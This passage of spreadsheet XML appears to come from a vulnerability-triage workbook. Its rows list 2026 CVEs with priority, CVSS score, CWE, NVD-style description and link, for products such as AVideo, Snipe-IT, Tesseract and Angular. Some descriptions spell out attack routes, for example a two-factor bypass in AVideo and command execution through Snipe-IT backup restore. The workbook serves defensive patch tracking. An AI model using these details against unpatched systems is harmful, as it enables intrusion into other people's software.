      <c r="M1476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86437</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86438</t>
        </is>
      </c>
      <c r="C1477" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1477" s="5" t="inlineStr"/>
      <c r="F1477" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1477" s="5" t="inlineStr"/>
      <c r="H1477" s="5" t="inlineStr"/>
      <c r="I1477" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1477" s="5" t="inlineStr"/>
      <c r="K1477" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1477" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 fails to authorize the MarketplaceModuleBrowser installModule Livewire action, allowing non-Superadmin administrators to install modules. Attackers can download and auto-activate arbitrary PHP modules from the marketplace over unsigned HTTP requests, achieving remote code execution.</t>
        </is>
      </c>
      <c r="M1477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86438</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="C1478" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1478" s="5" t="inlineStr"/>
      <c r="F1478" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1478" s="5" t="inlineStr"/>
      <c r="H1478" s="5" t="inlineStr"/>
      <c r="I1478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1478" s="5" t="inlineStr"/>
      <c r="K1478" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L1478" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M1478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86510</t>
        </is>
      </c>
      <c r="C1479" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1479" s="5" t="inlineStr"/>
      <c r="F1479" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1479" s="5" t="inlineStr"/>
      <c r="H1479" s="5" t="inlineStr"/>
      <c r="I1479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1479" s="5" t="inlineStr"/>
      <c r="K1479" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="L1479" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M1479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86712</t>
        </is>
      </c>
      <c r="C1480" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1480" s="5" t="inlineStr"/>
      <c r="F1480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1480" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1480" s="5" t="inlineStr"/>
      <c r="I1480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1480" s="5" t="inlineStr"/>
      <c r="K1480" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1480" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t>
        </is>
      </c>
      <c r="M1480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86720</t>
        </is>
      </c>
      <c r="C1481" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1481" s="5" t="inlineStr"/>
      <c r="F1481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1481" s="5" t="inlineStr"/>
      <c r="H1481" s="5" t="inlineStr"/>
      <c r="I1481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1481" s="5" t="inlineStr"/>
      <c r="K1481" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1481" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t>
        </is>
      </c>
      <c r="M1481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86722</t>
        </is>
      </c>
      <c r="C1482" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1482" s="5" t="inlineStr"/>
      <c r="F1482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1482" s="5" t="inlineStr"/>
      <c r="H1482" s="5" t="inlineStr"/>
      <c r="I1482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1482" s="5" t="inlineStr"/>
      <c r="K1482" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1482" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability where sqlDAL caches empty result sets that writeSql never invalidates. Attackers with a valid password can bypass email two-factor authentication on new devices because the confirmation code hash fails to generate from the stale cached empty result.</t>
        </is>
      </c>
      <c r="M1482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86723</t>
        </is>
      </c>
      <c r="C1483" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1483" s="5" t="inlineStr"/>
      <c r="F1483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1483" s="5" t="inlineStr"/>
      <c r="H1483" s="5" t="inlineStr"/>
      <c r="I1483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1483" s="5" t="inlineStr"/>
      <c r="K1483" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1483" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t>
        </is>
      </c>
      <c r="M1483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
      </c>
      <c r="C1484" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1484" s="5" t="inlineStr"/>
      <c r="F1484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1484" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1484" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I1484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1484" s="5" t="inlineStr"/>
      <c r="K1484" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1484" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client (`mysql`) without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as `\!` as local shell commands. An authenticated superadministrator who uploads a crafted ZIP backup (POST /admin/backups/upload) and triggers a restore (POST /admin/backups/restore/{filename}) without the optional `clean` sanitizer parameter — which is not applied by default because DB_SANITIZE_BY_DEFAULT is false — can execute arbitrary OS commands as the web application's operating-system user, exposing application secrets (including database credentials and APP_KEY) and allowing modification of application-writable files and data. Version 8.7.0 adds the --binary-mode flag to the client invocation.</t>
        </is>
      </c>
      <c r="M1484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="C1485" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1485" s="5" t="inlineStr"/>
      <c r="F1485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1485" s="5" t="inlineStr"/>
      <c r="H1485" s="5" t="inlineStr"/>
      <c r="I1485" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1485" s="5" t="inlineStr"/>
      <c r="K1485" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1485" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 does not apply the CheckUserIsActivated middleware to the `api` middleware group in app/Http/Kernel.php, and deactivating a user does not revoke that user's Passport personal access tokens. As a result, although a deactivated account is correctly refused at web login, its existing API token continues to authenticate and to grant read and write access to the REST API (assets, users, licenses, etc.) at the account's prior permission level until the token expires. A deactivated account that retains user-management permissions can re-activate itself through the API, permanently defeating the deactivation control.</t>
        </is>
      </c>
      <c r="M1485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86762</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86770</t>
        </is>
      </c>
      <c r="C1486" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1486" s="5" t="inlineStr"/>
      <c r="F1486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1486" s="5" t="inlineStr"/>
      <c r="H1486" s="5" t="inlineStr"/>
      <c r="I1486" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1486" s="5" t="inlineStr"/>
      <c r="K1486" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L1486" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate username case sensitivity during SAML authentication, allowing attackers to authenticate as different users by registering IdP accounts with accent or case variants of victim usernames. Attackers can exploit the default utf8mb4_unicode_ci database collation to bypass username matching and achieve account takeover through federated login paths including SAML, LDAP, and OAuth.</t>
        </is>
      </c>
      <c r="M1486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86770</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87633</t>
        </is>
      </c>
      <c r="C1487" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1487" s="5" t="inlineStr"/>
      <c r="F1487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1487" s="5" t="inlineStr"/>
      <c r="H1487" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1487" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1487" s="5" t="inlineStr"/>
      <c r="K1487" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1487" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87633</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87794</t>
        </is>
      </c>
      <c r="C1488" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1488" s="5" t="inlineStr"/>
      <c r="F1488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1488" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1488" s="5" t="inlineStr"/>
      <c r="I1488" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1488" s="5" t="inlineStr"/>
      <c r="K1488" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1488" s="5" t="inlineStr">
        <is>
          <t>bestzip versions 2.2.6 and 3.0.2 contain an argument injection vulnerability in the nativeZip function that allows attackers to inject arbitrary arguments to the Info-ZIP backend. Attackers can supply a malicious destination path combined with crafted source entries to execute arbitrary commands with Node.js process privileges. Fixed in 2.2.7 and 3.0.3.</t>
        </is>
      </c>
      <c r="M1488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87794</t>
        </is>
      </c>
    </row>
    <row r="1489">
      <c r="A1489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87931</t>
        </is>
      </c>
      <c r="C1489" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1489" s="5" t="inlineStr"/>
      <c r="F1489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1489" s="5" t="inlineStr"/>
      <c r="H1489" s="5" t="inlineStr"/>
      <c r="I1489" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1489" s="5" t="inlineStr"/>
      <c r="K1489" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L1489" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Behavioral Technology Group Pavlok Behavioral Conditioning Wearable up to 20260707. Impacted is an unknown function of the component Apple Notification Center Service Event Handler. The manipulation leads to buffer overflow. The attack must be carried out from within the local network. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M1489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87931</t>
        </is>
      </c>
    </row>
    <row r="1490">
      <c r="A1490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88047</t>
        </is>
      </c>
      <c r="C1490" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1490" s="5" t="inlineStr"/>
      <c r="F1490" s="5" t="inlineStr"/>
      <c r="G1490" s="5" t="inlineStr"/>
      <c r="H1490" s="5" t="inlineStr"/>
      <c r="I1490" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1490" s="5" t="inlineStr"/>
      <c r="K1490" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1490" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadNormProtos in src/classify/normmatch.cpp parses the NORMPROTO component of a .traineddata file and uses std::istream::operator&gt;&gt;(char*) to extract a whitespace-delimited token into a fixed 61-byte stack buffer without setting a stream width. The 100-byte line buffer can carry a token of up to 99 characters, so a token longer than 60 characters writes up to 39 attacker-controlled bytes past the buffer during TessBaseAPI::Init of the legacy engine, causing stack corruption, denial of service, and potentially control-flow hijacking on affected standard-library implementations. Builds using Apple's libc++ C++20 bounded array overload are incidentally protected, while typical libstdc++ builds remain affected. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88047</t>
        </is>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88048</t>
        </is>
      </c>
      <c r="C1491" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1491" s="5" t="inlineStr"/>
      <c r="F1491" s="5" t="inlineStr"/>
      <c r="G1491" s="5" t="inlineStr"/>
      <c r="H1491" s="5" t="inlineStr"/>
      <c r="I1491" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1491" s="5" t="inlineStr"/>
      <c r="K1491" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-787</t>
        </is>
      </c>
      <c r="L1491" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, FullyConnected::DeSerialize in src/lstm/fullyconnected.cpp does not validate the deserialized layer scalars ni_ and no_ against the weight-matrix dimensions. During FullyConnected::Forward, MatrixDotVector in src/lstm/weightmatrix.cpp writes w.dim1() results into temp_line, which is sized from no_, and reads w.dim2() minus one inputs from curr_input, which is sized from ni_. A crafted .traineddata NT_SOFTMAX layer can therefore use inconsistent dimensions to cause a heap out-of-bounds write and read on the default LSTM engine, resulting in heap corruption, a crash, information disclosure, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88048</t>
        </is>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88049</t>
        </is>
      </c>
      <c r="C1492" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1492" s="5" t="inlineStr"/>
      <c r="F1492" s="5" t="inlineStr"/>
      <c r="G1492" s="5" t="inlineStr"/>
      <c r="H1492" s="5" t="inlineStr"/>
      <c r="I1492" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1492" s="5" t="inlineStr"/>
      <c r="K1492" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1492" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, prior .traineddata hardening added bounds checks to NetworkIO::CopyTimeStepGeneral and NetworkIO::Randomize in src/lstm/networkio.cpp but left NetworkIO::WriteTimeStepPart and NetworkIO::AddTimeStepPart unchecked. In LSTM::Forward in src/lstm/lstm.cpp, source_ is sized from the independently deserialized na_ field while the WriteTimeStepPart count is ns_, which comes from the CI gate WeightMatrix dim1() value. A crafted NT_LSTM layer can make ns_ much larger than na_, causing a heap out-of-bounds write during the first recognition step on the default LSTM engine and resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88049</t>
        </is>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88051</t>
        </is>
      </c>
      <c r="C1493" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1493" s="5" t="inlineStr"/>
      <c r="F1493" s="5" t="inlineStr"/>
      <c r="G1493" s="5" t="inlineStr"/>
      <c r="H1493" s="5" t="inlineStr"/>
      <c r="I1493" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1493" s="5" t="inlineStr"/>
      <c r="K1493" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1493" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, the callback form of GenericVector::read in src/ccutil/genericvector.h reads the independent int32 fields reserved and size_used_ from a .traineddata model without a cap or an invariant check. reserve(reserved) allocates the backing array, but the callback loop writes size_used_ elements. A crafted TESSDATA_INTTEMP component with version_id 4 or later can therefore set reserved to a small value and size_used_ to a large value when fontinfo_table_.read(fp, read_info) is called from src/classify/intproto.cpp, causing a heap out-of-bounds write of FontInfo structures, heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88051</t>
        </is>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88053</t>
        </is>
      </c>
      <c r="C1494" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1494" s="5" t="inlineStr"/>
      <c r="F1494" s="5" t="inlineStr"/>
      <c r="G1494" s="5" t="inlineStr"/>
      <c r="H1494" s="5" t="inlineStr"/>
      <c r="I1494" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1494" s="5" t="inlineStr"/>
      <c r="K1494" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1494" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadIntTemplates in src/classify/intproto.cpp reads NumClassPruners, NumClasses, and NumProtoSets from the TESSDATA_INTTEMP component of a crafted .traineddata file and uses those values as loop bounds without validating them against MAX_NUM_CLASS_PRUNERS, MAX_NUM_CLASSES, and MAX_NUM_PROTO_SETS. The loops store heap pointers into fixed-capacity ClassPruners and ProtoSets arrays in INT_TEMPLATES_STRUCT and INT_CLASS_STRUCT, so an oversized count causes heap out-of-bounds pointer writes during legacy-classifier initialization before OCR begins, resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M1494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88053</t>
        </is>
      </c>
    </row>
    <row r="1495">
      <c r="A1495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88056</t>
        </is>
      </c>
      <c r="C1495" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1495" s="5" t="inlineStr"/>
      <c r="F1495" s="5" t="inlineStr"/>
      <c r="G1495" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1495" s="5" t="inlineStr"/>
      <c r="I1495" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1495" s="5" t="inlineStr"/>
      <c r="K1495" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1495"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M1495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88056</t>
        </is>
      </c>
    </row>
    <row r="1496">
      <c r="A1496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="C1496" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1496" s="5" t="inlineStr"/>
      <c r="F1496" s="5" t="inlineStr"/>
      <c r="G1496" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1496" s="5" t="inlineStr"/>
      <c r="I1496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1496" s="5" t="inlineStr"/>
      <c r="K1496" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L1496" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.30, 21.2.22, and 22.1.4, Angular server-side rendering (SSR) in @angular/platform-server serializes ProcessingInstruction DOM nodes inside fallback raw-content elements without escaping matching ancestor closing tags. ProcessingInstruction data escaped greater-than characters but left less-than characters untouched and did not inspect fallback ancestors, so data such as a matching closing tag prematurely terminates noscript, iframe, noembed, or noframes containers. The vulnerable nodes cannot be authored through standard Angular templates; reachability requires application or library code using inject(DOCUMENT).createProcessingInstruction with attacker-controlled data or Renderer2 DOM insertion inside a fallback container. In HTML5 RAWTEXT parsing, the premature close causes subsequent sibling elements to be interpreted as live HTML and enables arbitrary JavaScript execution in a victim's browser. This issue is fixed in versions 20.3.30, 21.2.22, and 22.1.4.</t>
        </is>
      </c>
      <c r="M1496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="1497">
      <c r="A1497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1497" s="5" t="inlineStr">
        <is>
